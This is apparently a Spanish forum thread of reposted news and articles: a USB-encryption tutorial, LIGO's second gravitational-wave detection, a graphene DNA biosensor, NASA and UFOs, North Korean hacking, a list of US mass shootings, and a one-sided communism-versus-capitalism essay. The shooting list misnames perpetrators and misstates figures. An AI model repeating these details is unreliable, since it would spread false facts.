Te aparecerá una ventana flotante en la que se detectará automáticamente la unidad USB o pendrive que tengas conectado a tu ordenador en ese momento, habitualmente en la unidad E:\. Esto puede variar dependiendo del ordenador, por lo que es recomendable seleccionar "Cambiar" y cerciorarse de que el USB seleccionado es tu pendrive.


3: Establece una contraseña para tu pendrive

Una vez que estés seguro de que tu pendrive es la opción seleccionada, deberás establecer una contraseña para el cifrado de tu pendrive y confirmarla.

Procura que la clave sea segura, nada obvio, pues suele ser el primer objetivo de los hackers. Tampoco busques demasiado complejo, pues si se te olvida te será imposible acceder a los datos almacenados en tu unidad USB.


Una vez que hayas pensado y confirmado la contraseña, pulsa sobre la opción de "Crear disco". Puede que toma más de diez minutos, por lo que no te preocupes si tarda demasiado o congela el funcionamiento del ordenador en el proceso.


4: Accede a tu pendrive con contraseña


Una vez que haya finalizado el proceso, expulsa tu unidad USB para volver a acceder a ella desde cero, esta vez con tu contraseña. Te servirá para comprobar si el proceso ha transcurrido con normalidad.


Desde tu ordenador puedes acceder a la carpeta cifrada dentro de tu pendrive desde un acceso directo en el escritorio. Si usas otro PC y quieres ver tus archivos, deberás usar uno de los dos ficheros ejecutables que Rohos Mini Drive ha creado dentro de tu unidad USB.


Una vez que accedas, es posible que tu PC detecte una nueva unidad flash USB, de nombre oculto. Se trata de la partición que el programa ha creado en tu pendrive. Sólo podrás entrar introduciendo la contraseña que has establecido.

Para revertir el cifrado de tu pendrive, en caso de que algo haya salido mal, sólo necesitas formatearlo de la forma habitual. El cifrado impedirá a cualquier persona no autorizada acceder a tus archivos, pero no le impedirá borrarlos.



Autor de este tutorial: Eduardo Álvarez

Bueno espero que os sirva como siempre me gusta compartir con vostros.

Saludos.
#1958
Investigadores de la Universidad de las Islas Baleares han participado en el descubrimiento

El pasado mes de febrero, el observatorio LIGO anunciaba la primera detección de ondas gravitatorias. Ahora, anuncia una segunda detección de estas ondulaciones del espacio-tiempo. Esta segunda señal, bautizada como GW151226, también procede de la fusión de dos agujeros negros. La Universidad de las Islas Baleares ha participado en el hallazgo.

El 26 de diciembre de 2015 a las 03:38:53 UTC, los científicos observaron ondas gravitatorias -ondulaciones en el tejido del espacio-tiempo- por segunda vez, tras la primera observación, anunciada el pasado mes de febrero.

GW151226 es la segunda observación clara de una fusión de agujeros negros y, junto con GW150914 (la primera), marca el inicio de la astronomía de ondas gravitatorias como un medio para explorar nuevas fronteras de nuestro universo.

Las ondas gravitatorias fueron  detectadas en este caso por los dos detectores gemelos del Observatorio  por Interferometría Láser de Ondas Gravitacionales (LIGO, por sus siglas en inglés), ubicados en Livingston, Louisiana, y Hanford, Washington, EE.UU.

Los observatorios LIGO están financiados por la National Science Foundation (NSF), y fueron concebidos y construidos y son operados por Caltech y MIT. El descubrimiento, aceptado para su publicación en la revista Physical Review Letters, fue realizado por la Colaboración Científica LIGO (que incluye la Colaboración GEO y el Australian Consortium for Interferometric Gravitational Astronomy) y la colaboración Virgo usando datos de los dos detectores LIGO.

La UIB participa en este nuevo descubrimiento

Esta señal, GW151226, fue identificada a tan sólo 70 segundos de su llegada a la Tierra por los algoritmos de baja latencia. Aproximadamente un minuto después, se tenían las primeras indicaciones del origen de la señal gracias a una técnica conocida como filtrado adaptado.

En este método, los datos se comparan con muchas predicciones de señales gravitacionales (catálogos de formas de onda) con el fin de encontrar la que coincide mejor. En este caso, el filtrado adaptado fue esencial tanto para la detección como para el posterior análisis de GW151226, debido a que ésta tiene una menor intensidad, en comparación con la deGW150914, y es difícil de ver a simple vista.

El desarrollo de catálogos precisos de formas de onda basados en la relatividad general resulta imprescindible para estudiar las fusiones de binarias de agujeros negros y es una de las actividades principales del grupo de Relatividad y Gravitación (GRG) en la Universidad de les Illes Balears (UIB).

Además, sus fórmulas son utilizadas para generar los varios cientos de miles de patrones de onda utilizados en el análisis de los datos de LIGO/Virgo y llevar a cabo este descubrimiento.

Para calibrar estos bancos de patrones es necesario la utilización de simulaciones numéricas, generadas en muchos casos gracias al uso de infraestructura computacional europea (PRACE) y de la Red Española de Supercomputación.

Cabe señalar que el Dr. Sascha Husa,  profesor de la UIB y miembro del GRG, lidera un proyecto internacional que ha sido recientemente seleccionado por PRACE, con más de 8 millones de horas de CPU, y desde el 2010 el grupo de la UIB ha tenido acceso de forma continuada a tiempo de cálculo en el MareNostrum, el supercomputador más potente de España del BSC-CNS, que ha sido esencial para el desarrollo de estos catálogos.

Por otro lado el grupo de la UIB, liderado por la Dra. Alicia Sintes, está totalmente volcado en análisis de los datos de LIGO, a la caza de una posible señal gravitacional continua procedente de púlsares desconocidos (estrellas de neutrones en rotación).

Estas señales son tan débiles, que es necesario integrar todos los datos tomados durante estos 4 meses para tener alguna oportunidad de ver algo. Si este análisis desvelase alguna señal, ésta nos aportaría información sobre la materia en el interior de las estrellas de neutrones, un objeto del tamaño aproximado de Menorca y con una masa un 50% mayor que nuestro Sol, gobernado por las leyes de la teoría cuántica.

La Dra. Alicia Sintes de la UIB lidera el único grupo español miembro de la Colaboración Científica LIGO. Desde marzo del 2016, la Dra. Sintes, junto con el Prof. Keith Riles de la Universidad de Michigan, preside el grupo de trabajo LIGO-Virgo para la búsqueda de señales gravitacionales continuas. La Dra. Sintes y el Dr. Sascha Husa, forman parte del Consejo de LIGO y han participado, junto con otros miembros del grupo de la UIB, en los artículos de estos descubrimientos.



El origen de la señal

Las ondas gravitacionales llevan consigo información sobre sus orígenes y sobre la naturaleza de la gravedad que no puede obtenerse de otra forma, y los físicos han llegado a la conclusión de que las ondas gravitatorias detectadas el 26 de diciembre de 2015, una vez más se produjeron durante los momentos finales de la fusión de dos agujeros negros de 14 y 8 masas solares para producir un único agujero negro en rotación más masivo, de unas 21 veces la masa del sol.

Durante la fusión, que se produjo hace aproximadamente 1400 millones de años, una cantidad de energía más o menos equivalente a la masa del sol se convirtió en ondas gravitacionales.

La señal detectada proviene de las últimas 27 órbitas de los agujeros negros antes de su fusión. El tiempo de llegada de las señales, medida 1.1 milisegundos antes en el detector de Livingston que en el detector de Hanford, da una idea aproximada de la posición de la fuente en el cielo.

"Es muy significativo que estos agujeros negros fuesen mucho menos masivos que los de la primera detección", dice Gabriela González, portavoz de la Colaboración Científica LIGO (LSC) y profesora de física y astronomía en la Universidad del Estado de Louisiana.

"Debido a sus masas más ligeras, se pasaron más tiempo -alrededor de un segundo- en la banda sensible de los detectores. Es un comienzo prometedor para el estudio de las poblaciones de los agujeros negros en nuestro universo."

Las primeras detecciones

La primera detección de ondas gravitacionales, anunciada el 11 de febrero de 2016, fue un hito en la física; se confirmó una importante predicción de la teoría general de la relatividad de Einstein del 1915, y marcó el inicio del nuevo campo de la astronomía de ondas gravitacionales.

El segundo descubrimiento "ha puesto verdaderamente la 'O' de Observatorio en LIGO", dice Albert Lazzarini de Caltech, director adjunto del Laboratorio LIGO. "Con la detección de dos eventos fuertes en los cuatro meses de nuestro primer periodo de observación, podemos empezar a hacer predicciones acerca de la frecuencia con la que podríamos estar escuchando las ondas gravitacionales en el futuro. LIGO nos trae una nueva manera de observar algunos de los eventos más oscuros y más energéticos en nuestro universo".

Ambos descubrimientos fueron posibles gracias a las capacidades mejoradas de Advanced-LIGO, una importante actualización que aumenta la sensibilidad de los instrumentos en comparación con los detectores LIGO de primera generación, lo que permite un gran aumento del volumen del universo explorado.

El próximo periodo de observación Advanced-LIGO tendrá lugar este otoño. Para entonces, se espera que mejoras en la sensibilidad del detector permitirán a LIGO alcanzar un volumen de  universo de 1.5 a 2 veces mayor. Se espera que el detector Virgo se una en la segunda mitad de este periodo de observación.

La investigación en LIGO es llevada a cabo por la Colaboración Científica LIGO (LSC), un grupo de más de 1.000 científicos de universidades de todo Estados Unidos y de otros 14 países. Más de 90 universidades e institutos de investigación de LSC desarrollan tecnología para el detector y analizan datos; alrededor de unos 250 estudiantes contribuyen de forma relevante a la colaboración. La red de detectores LSC incluye los interferómetros de LIGO y el detector GEO600.

La investigación en Virgo es llevada a cabo por la Colaboración Virgo, un grupo de más de 250 físicos e ingenieros pertenecientes a 19 grupos de investigación europeos diferentes: 6 en el Centre National de la Recherche Scientifique (CNRS) de Francia; 8 en el Istituto Nazionale di Fisica Nucleare (INFN) en Italia; Nikhef en los Países Bajos;  el instituto Wigner  RCP en Hungría; el grupo POLGRAW en Polonia; y el European Gravitational Observatory (EGO), el laboratorio que alberga el  interferómetro Virgo cerca de Pisa en Italia.

La NSF de Estados Unidos lidera el apoyo financiero de Advanced-LIGO. Organismos de financiación en Alemania (Sociedad Max Planck),  Reino Unido (Consejo de Infraestructuras de  Ciencia y Tecnología,  STFC) y Australia (Consejo Australiano de Investigación) también han contribuido significativamente al proyecto.

Varias de las tecnologías clave que hicieron que Advanced-LIGO fuera mucho más sensible fueron desarrolladas y probadas por la colaboración británico-alemana GEO. Recursos informáticos han sido aportados de forma significativa por el clúster Atlas del AEI-Hannover, el Laboratorio LIGO,  la Universidad de Syracuse, el clúster ARCCA de la Universidad de Cardiff, la Universidad de Wisconsin-Milwaukee y el Open Science Grid. Varias universidades han diseñado, construido y probado componentes clave para Advanced-LIGO: La Universidad Nacional de Australia, la Universidad de Adelaida, la Universidad de Australia Occidental, la Universidad de Florida, la Universidad de Stanford, la Universidad de Columbia de Nueva York, y la Universidad Estatal de Louisiana.

El equipo de GEO incluye científicos del Instituto Max Planck de Física Gravitacional (Albert Einstein Institute, AEI), la Universidad Leibniz de Hannover, junto a los socios de la Universidad de Glasgow, Universidad de Cardiff, la Universidad de Birmingham, otras universidades en el Reino Unido y Alemania y la Universidad de las Islas Baleares en España.


http://www.tendencias21.net/LIGO-vuelve-a-detectar-ondas-gravitatorias_a42803.html

No sabía yo que se podían detectar hasta dos veces las ondas gravitatorias tan difícil era antes que ahora la vuelven a detectar con facilidad ?  :huh:
#1959

Un grupo de bioingenieros de la Universidad de California en San Diego ha desarrollado un chip biosensor de grafeno que tiene la capacidad de detectar las mutaciones de ADN para diagnosticar enfermedades graves.

Uno de los indicadores más comunes de muchas patologías es la presencia de una mutación genética conocida como polimorfismo de un solo nucleótido (SNP por sus siglas en inglés). Se trata de una variación que afecta a uno de los elementos fundamentales del ADN, que es reemplazado por otro en la secuencia del genoma.

La mayoría de estos cambios no tienen ningún efecto sobre la salud, pero algunos de ellos están asociados a patologías como el cáncer, la diabetes, las enfermedades del corazón, neurodegenerativas, autoinmunes e inflamatorias. Además, también puede afectar a la forma en la que el organismo reacciona ante las bacterias, los virus, los medicamentos y otras sustancias.

Hasta ahora, realizar pruebas para la detección de este tipo de mutación es una tarea lenta, compleja y cara. El chip biosensor de grafeno que han diseñado estos investigadores terminaría con este problema, ya que se trata de una solución barata que permite hacer los tests con facilidad y en tiempo real para ofrecer los resultados cuanto antes a los pacientes.

"Estamos liderando el desarrollo de un método digital rápido y de bajo costo para detectar mutaciones en alta resolución en la escala de un único cambio de nucleótido en una secuencia de ácido nucleico", explica Ratnesh Lal, uno de los miembros del equipo.



El dispositivo consiste en una sonda de ADN incorporada en un transistor de efecto campo de grafeno. El chip está especialmente diseñado para capturar las moléculas de ADN o ARN con un solo nucleótido, y cada vez que se detecta una de estas mutaciones, el biosensor produce una señal eléctrica.

La tecnología, que de momento se encuentra en fase de prueba de concepto, es un primer paso hacia un chip biosensor que se puede implantar en el cuerpo para detectar una mutación de ADN específica en tiempo real. El dispositivo transmitiría la información obtenida de manera inalámbrica a un teléfono móvil o a un ordenador para ponerla en conocimiento de los médicos.

Más adelante, los científicos prevén probar el chip en el ámbito clínico y utilizarlo para realizar biopsias líquidas. Esperan que esta tecnología pueda conducir a una nueva generación de diagnósticos y tratamientos personalizados en medicina.


http://www.tendencias21.net/Un-chip-electrico-de-grafeno-detecta-mutaciones-en-el-ADN_a42799.html
#1960
VIRAL. ¿Crees que existe vida fuera de la Tierra? Todos los días se observan objetos extraños en el universo y la mayoría de personas siempre se pregunta si son reales los extraterrestres o son invento de los humanos para generar pánico en la población. Un ex trabajador de la NASA reveló algo sorprendente sobre la posible existencia ovni.


Su nombre es James Oberg y trabajaba como miembro de personal de control de misiones de la NASA. Según este hombre es cierto que se dan ciertos avistamientos que resultan raros en el Universo, pero que la sociedad está haciendo una malinterpretación de los fenómenos pensando que son naves alienígenas cuando en realidad se trata de algo mucho más simple.

Según Oberg, por ejemplo, las luces parpadeantes que muchas veces se ven moverse a una gran velocidad no son más que pequeños trozos de basura espacial que se mueve a la misma velocidad que el vehículo espacial del que se desprende y se pueden observar a simple vista. Caen a tal velocidad que generan luces parpadeantes y hasta pueden desintegrarse en miles de pedazos cuando pasa por las capas de la tierra.



"Nuestro sistema sensorial está funcionando perfectamente para las condiciones absolutas de la Tierra. Yendo más allá de nuestro 'barrio' las cosas se ponen visualmente confusas", explica. ¿Opinas lo mismo?

Para ejemplificar su explicación, este experimentado astrónimo recuerda un misterioso caso de un rayo de luz sobre el cielo del estado de California, en Estados Unidos. Ocurrió el año pasado y mucha gente pensó que se trataba de un OVNI, pero en realidad el Ejército dejó claro que había sido una prueba de misiles.

De forma tal que todos los fenómenos que se observan en la Tierra no son nada más que basura espacial y no tiene relación con extraterrestres ni mucho menos de la posible teoría de que exista vida en otro lado.



Hace unas semanas, un video mostró supuestos ovnis fueron captados por la Estación Espacial Internacional. En la grabación se muestra cómo un ente totalmente rato flota en el aire. Cuando esto fue captado por la NASA, la transmisión que realiza en vivo vía streaming, de repente, se corta, dice el narrador de YouTube.


Luego de la gran polémica que ha causado este video, la NASA se pronunció a través de su vocera Tabatha Thompson. Según indicó, en un principio le restaron importancia al hecho; sin embargo, y en vista de la importancia que adquirió el material, decidieron negar el hecho.

"Ningún ovni en el sentido popular de la palabra ha sido visto cerca de la Estación Espacial Internacional", indicó la portavoz de la NASA a la cadena de televisión estadounidense CNN. ¿Qué opinas de la explicación de la NASA?



Si señores vuelve a foro libre lo ufo después de un tiempo de tregua  :xD
#1961
Corea del Norte ha hackeado más de 140.000 ordenadores de empresas e agencias surcoreanas




Corea del Norte ha hackeado más de 140.000 ordenadores de 160 compañías surcoreanas y agencias del Gobierno para introducirles un código malicioso con el objetivo de realizar un ciberataque masivo en el futuro, según ha informado la Policía surcoreana.


El pirateo comenzó en 2014 y fue detectado en febrero de 2016 después de que Corea de Norte robase información de dos grandes grupos, incluido material e información relativos a la defensa, según ha explicado la unidad de investigación cibernética de la Policía. Varios medios de comunicación locales han apuntado que los dos grupos que sufrieron el robod de información son SK y Haljin.


"Hay una alta posibilidad de que Corea del Norte busque causar confusión a escala nacional lanzando un ataque simultáneo después de asegurarse muchos objetivos de 'ciberterror' o de intentar robar continuamente secretos industriales y militares", ha señalado la Policía surcoreana.

Tras conseguir el control de los servidores de los ordenadores, los hackers no han llevado a cabo ninguna acción. La Policía considera que probablemente se trate de una estrategia para llevar a cabo un ciberataque a gran escala. Corea del Sur ha elevado la alerta contra ciberataques ejecutados por Corea del Norte después de que el país llevase a cabo los ensayos nucleares en el mes de enero y lanzara un cohete de largo alcance en febrero, lo que condujo a nuevas sanciones a Pyongyang ...

Leer mas: http://www.europapress.es/internacional/noticia-corea-norte-hackeado-mas-140000-ordenadores-empresas-agencias-surcoreanas-20160613122119.html

#1962

La matanza ocurrida en un club gay de Orlando (Florida) en la que murieron al menos 50 personas es la peor de la historia de Estados Unidos provocada por tiroteos masivos de los que se registraron 132 este año, según el sitio web Shootingtracker.com.

Este sitio recopila todos los incidentes con armas de fuego ocurridos en el país en los que hubo por lo menos cuatro víctimas (ya fueran fallecidos o heridos) y que han dejado 156 muertos durante 2016.

El incidente más grave ocurrido hasta ahora durante este año se produjo el 22 de abril en el condado de Pike en el estado de Ohio, donde ocho miembros de una misma familia, incluido un joven de 16 años, murieron tiroteados en lo que pudo ser una ejecución por motivos desconocidos.

Seis personas, entre ellas un niño de ocho años, murieron en la ciudad de Kalamazoo (Michigan) el 20 de febrero, la misma cifra de fallecidos que el 27 de enero en Chesaspeake (Virginia).

De acuerdo con los datos de Shootingtracker.com, durante 2015 se produjeron 372 tiroteos masivos y 367 muertos, alrededor de uno al día. El más grave fue el protagonizado el 2 de diciembre por un matrimonio que asesinó a catorce personas en un centro de ayuda para discapacitados en San Bernardino (California).

Ese incidente podría ser calificado de terrorismo después de que el FBI revelara que la pareja se había radicalizado y podría haberse inspirado en grupos yihadistas como el Estado Islámico.Principales matanzas indiscriminadas en EEUU.

-1 de agosto de 1966: Charles Whitman, tirador de élite, mata a 16 personas desde la azotea de la Universidad de Austin (Texas). El día anterior había matado a su mujer y a su madre.

-18 julio 1984: Oliver Humberty, veterano de Vietnam, asesina a tiros a 22 personas en un restaurante en San Diego (California), antes de ser abatido por la policía.

-20 agosto 1986: Patrick Henry Sherrill, un cartero estadounidense amenazado de despido, mata a tiros a 14 personas en una oficina postal de Edmond (Oklahoma).

-29 diciembre 1987: Gene Simmons, sargento retirado, enloquecido por sus problemas económicos, mata a 16 personas (5 miembros de su familia) en Russellville (Arkansas).
16 octubre 1991: El camionero, George Hennard, mata a 22 personas en una cafetería de Killeen (Texas) antes de suicidarse.

-20 abril 1999: Dos estudiantes matan a 13 personas y hieren a 23 en la escuela de Columbine, en Littleton (Colorado), antes de suicidarse.

-16 de abril de 2007: Seung-Hui Cho, de 23 años, mata a 32 personas y se suicida en el campus universitario en Blacksburg, Virginia.

-5 de noviembre de 2009: El psiquiatra militar Nidal Hasan, mata a tiros a 13 personas en el Centro de Procesamiento de Preparación de Soldados en Fort Hood, Texas.

-14 de diciembre de 2012: Adam Lamza, mata a 26 personas, entre ellas 20 niños, en una escuela primaria de Newtown en Connecticut antes de suicidarse. El día anterior había matado a su madre en su casa.

-16 de septiembre de 2013: Aaron Alexis mata a 13 personas antes de acabar con su vida en el Mando de Operaciones de la Armada en Washington DC.

-2 diciembre 2015: 14 personas mueren en un tiroteo registrado en un centro de ayuda para discapacitados en San Bernardino (California), protagonizado por el matrimonio formado por Syed Farook y Tashfeen Malik.

-20 febrero 2016: 6 personas, entre ellas un niño de ocho años, mueren en la ciudad de Kalamazoo (Michigan) en una serie de tiroteos protagonizados por Jason Dalton, posteriormente detenido.

-22 abril 2016: 8 miembros de una familia, posiblemente ejecutados, en el condado de Pike (Ohio).


http://www.elmundo.es/america/2016/06/12/575d812fca4741321c8b456c.html
#1963
La historia mundial no conoce muchos ejemplos de un antagonismo tan puro como el del comunismo y el capitalismo, un antagonismo que ha marcado el siglo XX y generado muchas ideas falsas entre la mayoría de la sociedad.

¿Cuáles son los mitos más comunes en torno a los dos sistemas? ¿Cómo son los nuevos comunistas y por qué algunos llaman a los piratas informáticos "los izquierdistas a nivel tecnológico"? ¿Qué futuro le espera al capitalismo y si es posible una nueva revolución comunista?

En este artículo, buscamos las respuestas sobre los dos sistemas más polares de la historia.


El debate entre el comunismo y el capitalismo es una batalla entre dos teorías socioeconómicas extremas, teorías que representan dos maneras inherentemente opuestas del pensamiento. Una de ellas es sumamente individualista (el capitalismo), mientras que la otra (el comunismo) antepone a la sociedad. Para explorar estas dos ideologías, el portal Buzzle compara uno por uno sus principales diferencias.

Propiedad de los medios de producción

La principal diferencia entre el capitalismo y el comunismo tiene que ver con la propiedad de los medios de producción o los recursos en general.

El comunismo rechaza a la propiedad privada/individual de la tierra o de los recursos vitales. En cambio, todos los medios de producción, como la tierra, deben ser propiedad del Estado, pero en el sentido de toda la comunidad de personas. Todas las tierras y los recursos que faciliten la producción de bienes y servicios son propiedad de todos y cada uno, todo es compartido, y todas las decisiones sobre la producción son tomadas por toda la comunidad por vía democrática. Además, hay un salario igual para todos, y todas las decisiones se deben tomar de acuerdo a lo que sea bueno para todos.

Por otra parte, el capitalismo se basa en la propiedad privada de la tierra y los medios de producción. Cada persona tiene que ganarse lo suyo, y una parte importante de los beneficios obtenidos por un negocio va al bolsillo de la persona que posee los medios de producción, mientras que los trabajadores que se encargan de dirigir el negocio tienen una pequeña participación. Cada persona recibe su salario conforme a su mérito y, naturalmente, las personas que posean los medios de producción tendrán la última palabra a la hora de adoptar las decisiones.

Como vemos, la propiedad de medios de producción es una de las principales manzanas de la discordia entre las dos ideologías, cada una de las cuales se basa en una idea extrema al respecto y, por lo tanto, comporta riesgos y debilidades.

Mientras el comunismo puede acabar con la idea de la iniciativa individual, que ha dado lugar a la mayoría de las innovaciones tecnológicas que tenemos hoy en día, el capitalismo contiene la semilla de la explotación, donde demasiada riqueza, y por lo tanto el poder, se concentra en las manos de unas pocas personas.

Libertad individual

El antagonismo entre el comunismo y el capitalismo se refleja también en sus puntos de vista dispares sobre la libertad individual. El comunismo pide anteponer la sociedad al individuo, mientras que el capitalismo pone la libertad individual por delante de la sociedad.

Por lo tanto, la polaridad entre las dos ideologías se podría describir como "el individualismo contra el bienestar social". El capitalismo le da más importancia a las aspiraciones individuales y apela a la naturaleza egoísta inherente de los seres humanos, que a menudo es el resultado del instinto de autoconservación.

Mientras tanto, el comunismo apela a nuestro lado más santo, en que pensamos en los demás, antes que en nosotros mismos, reza el artículo.

De nuevo se trata de dos puntos de vista extremos, que tienen sus ventajas y desventajas. Así, algunos de los mayores avances en la historia de la humanidad han ocurrido gracias a la creatividad y a la iniciativa individual y en gran parte han sido frutos del egoísmo humano, aunque, en última instancia, beneficiaron a toda la sociedad.

El comunismo puede afectar a esta iniciativa individual, así como a la creatividad y el pensamiento original, haciendo que una persona haga lo que le digan.

El capitalismo, a su vez, alimenta deseos egoístas, lo cual amenaza con la aparición de autócratas capitalistas que puedan obtener el control de la vida y la muerte de miles de personas.



Sociedad

El comunismo defiende una sociedad igualitaria, sin diferencias de clases, razas, religiones o incluso nacionalidades, y donde todos los hombres y las mujeres estén en las mismas condiciones. De esta manera, no hay nada por lo que las personas puedan disputar.

Esto es bueno como una idea, pero tratar de ponerla en práctica es difícil, sostiene el portal. Además, agrega, es injusto pedir a las personas que renuncien a todas las cosas que las hacen diferentes.

El capitalismo promueve la distinción entre clases, creando una brecha entre ricos y los pobres, ya que en el capitalismo puro los ricos se hacen más ricos y los pobres, más pobres; la clase rica controla los medios de producción y ejerce el poder, imponiendo a la sociedad su propia distinción de clases y sus caprichos.


Anatomía del poder

Comunismo apela al ideal más elevado del altruismo, mientras que el capitalismo promueve el egoísmo.

En el capitalismo, la riqueza y el poder se concentran en las manos de las personas que poseen los medios de producción. Es decir, se crea una élite que controla el dinero, los recursos y el poder.

El comunismo, en teoría, se basa en la naturaleza santa, altruista y desinteresada de toda la humanidad, y, por lo tanto, en la distribución igual del poder. Todas las decisiones se toman por medios democráticos y no debe haber leyes injustas que favorezcan solo a algunos.

Sin embargo, hay que tener en cuenta que la gente es inherentemente egoísta y el poder puede corromper la mente de una persona, fallando a la ideología y creando una sociedad injusta, reza el artículo.

"En última instancia, lo que necesitamos es un enfoque equilibrado, una combinación de buenos puntos de las dos ideologías. Una economía mixta donde el Estado tenga el control de los recursos vitales de una nación, garantice el bienestar para los más necesitados, a la vez que promueva el espíritu empresarial libre", concluye.

El debate entre los dos sistemas ha dado lugar a numerosos mitos que hoy en día, muchas personas siguen creyendo. Estas son las siete ideas falsas más comunes sobre el comunismo y el capitalismo.

La lista fue elaborada por el bloguero Jesse Myerson, quien afirma en su artículo publicado en el portal Salon.com que la mayor parte de lo que los estadounidenses piensan sobre el capitalismo y el comunismo es una "una tontería redomada".

"Esto no es sorprendente, dada la historia de los Temores rojos de nuestro país, diseñados para crear la impresión de que el anti-capitalismo es equivalente a traición", escribe Myerson.

1. Las economías comunistas se basan en la violencia de Estado

Es comúnmente aceptado que la regulación estatal de la economía en la URSS o en China constituye un instrumento represivo que solo es utilizado por un Estado que intenta penetrar en todas las áreas de la sociedad para dominarla. No obstante, el poder estatal es una condición indispensable para la protección de la propiedad, piedra angular del capitalismo. La única diferencia entre estos dos sistemas antagónicos consiste en que los comunistas insisten en que la propiedad, es decir, los medios de producción (como fábricas) o las acciones y bonos, debe ser distribuida universalmente entre toda la sociedad.

2. Las economías capitalistas se basan en el libre intercambio

La bucólica imagen de un mercado abundante, donde cada persona libremente puede satisfacer sus necesidades también es un mito bastante común. La realidad es que la naturaleza del mercado y su origen están marcados por las expropiaciones, como la privación a los campesinos de su acceso a las tierras, y la falta de libertades. La situación no ha cambiado mucho hoy en día en que la gran mayoría de la población se ve privada del acceso a los recursos necesarios pese a su aparente abundancia. Además, cabe recordar que para su desarrollo el capitalismo estadounidense requirió exterminar a pueblos indígenas y esclavizar a los africanos.  

3. Los Gobiernos capitalistas no atentan contra los derechos humanos

Sería poco creíble que un sistema que aplaude al rápido enriquecimiento en medio de una competencia despiadada no produjera graves actos de violencia y privaciones, pero curiosamente sus defensores mantienen que estos 'excesos' son una manifestación de la justicia y la libertad. Los que no estén convencidos de la tesis anterior podrían recordar que uno de los derechos fundamentales, el derecho a la vida, se viola diariamente cuando miles de personas mueren de desnutrición debido a que el libre mercado es incapaz de resolver este problema global.

4. Los regímenes comunistas son responsables de millones de muertes

Quienes se animan enumerando los crímenes (tanto supuestos como reales) cometidos por regímenes comunistas prefieren no recordar que el triste balance de víctimas nunca estará a favor del capitalismo. Los defensores del capitalismo, en este caso, tendrán que buscar alguna excusa convincente tanto para el comercio de esclavos y el exterminio indígena como para las masacres realizadas por EE.UU. y sus aliados en sus intentos de derrocar gobiernos procomunistas. A esta cuenta hay que añadir el número de muertes a causa de las transiciones de países del bloque socialista al capitalismo. Los anticomunistas más virulentos tienen una manera muy astuta para desmentir estos casos de exterminio: simplemente niegan que hayan sucedido.

5. El comunismo promueve la uniformidad

Mientras que el inconsciente colectivo prevalece la imagen de una sociedad homogénea e altamente ideologizada que no deja espacio a la creación, este mito ya se ha hecho realidad en la mayoría de las sociedades capitalistas, donde crece la tendencia al consumismo descontrolado incitado por necesidades ficticias. Al contrario, la ideología marxista postulaba que uno de los objetivos del comunismo consiste en la liberación del tiempo para el desarrollo personal. De esa manera, el comunismo se basa en todo lo contrario a la uniformidad.

6. El capitalismo promueve el individualismo

En una sociedad de masas, donde millones y millones de personas están produciendo y consumiendo las mismas cosas a gran escala, el individualismo parece casi un milagro o al menos una excepción de la regla. A veces basta con echar un vistazo a los barrios residenciales de las grandes ciudades con sus casas o supermercados uniformados para concluir que es el producto de una sociedad completamente opuesta a lo individual.

El debate entre los dos sistemas ha dado lugar a numerosos mitos que hoy en día, muchas personas siguen creyendo. Estas son las siete ideas falsas más comunes sobre el comunismo y el capitalismo.

La lista fue elaborada por el bloguero Jesse Myerson, quien afirma en su artículo publicado en el portal Salon.com que la mayor parte de lo que los estadounidenses piensan sobre el capitalismo y el comunismo es una "una tontería redomada".

"Esto no es sorprendente, dada la historia de los Temores rojos de nuestro país, diseñados para crear la impresión de que el anti-capitalismo es equivalente a traición", escribe Myerson.

En 1867, en su libro 'El Capital' Karl Marx hizo su famosa predicción de la 'muerte' inminente del capitalismo. Pasados casi 150 años, el sistema está vivo y el debate sobre su futuro continúa con mayor o menor intensidad. La crisis que durante los últimos años sufren varios países desarrollados hace que cada vez más los expertos hablen de grandes cambios que pronto tendrán lugar en el actual sistema social y económico a nivel mundial.

Tras la desintegración de la Unión Soviética, gran parte de la población creyó que el capitalismo había triunfado por completo. Sin embargo, en los últimos años el sistema económico afronta numerosas conmociones económicas y sociales. En Occidente se reduce la clase media, aumenta de forma alarmante el paro y el 'estado del bienestar', considerado como el mayor logro del capitalismo de postguerra, cada vez más es una realidad del pasado. Por otra parte, en Oriente la explotación de trabajadores adquirió los niveles del cruel siglo XIX.




--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



En el nuevo libro '¿Tiene futuro el capitalismo?', obra conjunta de varios economistas y sociólogos reconocidos a nivel internacional, los expertos coinciden en que el mundo está a punto de entrar en una crisis estructural del sistema capitalista, revela la revista 'Expert'. De este modo, el sociólogo estadounidense Immanuel Wallerstein escribe que el crecimiento del capitalismo alcanzó su tope en los años 70, mientras que todas las décadas siguientes el sistema solo superó las numerosas crisis, sin resolver ningún problema.

"El sistema mundial moderno no puede seguir de la misma manera, ya que el capitalismo no puede acumular ganancias sin parar", concluye el experto. Por su parte, el doctor Randall Collins destaca que el fin del capitalismo se producirá en 2040, año en que según él, más de un 50% de la población activa perderá su trabajo por los procesos de sustitución tecnológica.

El mayor interrogante para Collins es qué sistema ocupará su lugar: ¿una dictadura fascista o un sistema democrático no capitalista? Pero lo más probable según el experto es que "en los próximos siglos tendrá lugar un constante cambio entre dos sistemas: del capitalismo al socialismo, y a lo mejor, otra vez al capitalismo".

A su vez, para el sociólogo Craig Calhoun, el capitalismo se salvará solo en caso de superar tres amenazas pendientes: el desequilibrio del sector financiero en relación a otros ámbitos de la economía que provocan enormes deudas y especulaciones irresponsables; los problemas sociales y ecológicos creados por las políticas neoliberales, y por último, las posibles guerras y cambios climáticos.

"El fantasma del comunismo ha vuelto, y ahora no solo recorre Europa". A esta conclusión llega un reciente artículo de la revista 'Russki Reporter', que sostiene que tras la crisis de 2008, se habla cada vez más de un inevitable colapso del capitalismo.

En cuanto a Europa, el artículo hace hincapié en la "socialista y antiglobalista" Syriza en Grecia, y en la creciente fuerza de Podemos en España, mientras que el movimiento 'Occupy' en EE.UU. y las victorias de la izquierda en América Latina "hacen pensar en el renacimiento del movimiento de izquierda en el Nuevo Mundo".

¿Cómo son los nuevos izquierdistas?

"¿Qué clase de futuro es el que nos están preparando los nuevos izquierdistas? ¿Qué es lo que nos espera: la realización de una nueva utopía social o una distopía sombría?", se preguntan los autores del artículo.

Los nuevos izquierdistas son muy diferentes entre sí: "desde los intelectuales académicos hasta los revolucionarios del pueblo que lideran la lucha por la liberación nacional en el Tercer Mundo", detalla la publicación, agregando que en la sociedad europea o incluso en la estadounidense, el izquierdismo moderado se va convirtiendo en la norma, "aunque no siempre se trata del verdadero marxismo, sea cual sea el significado de este término".

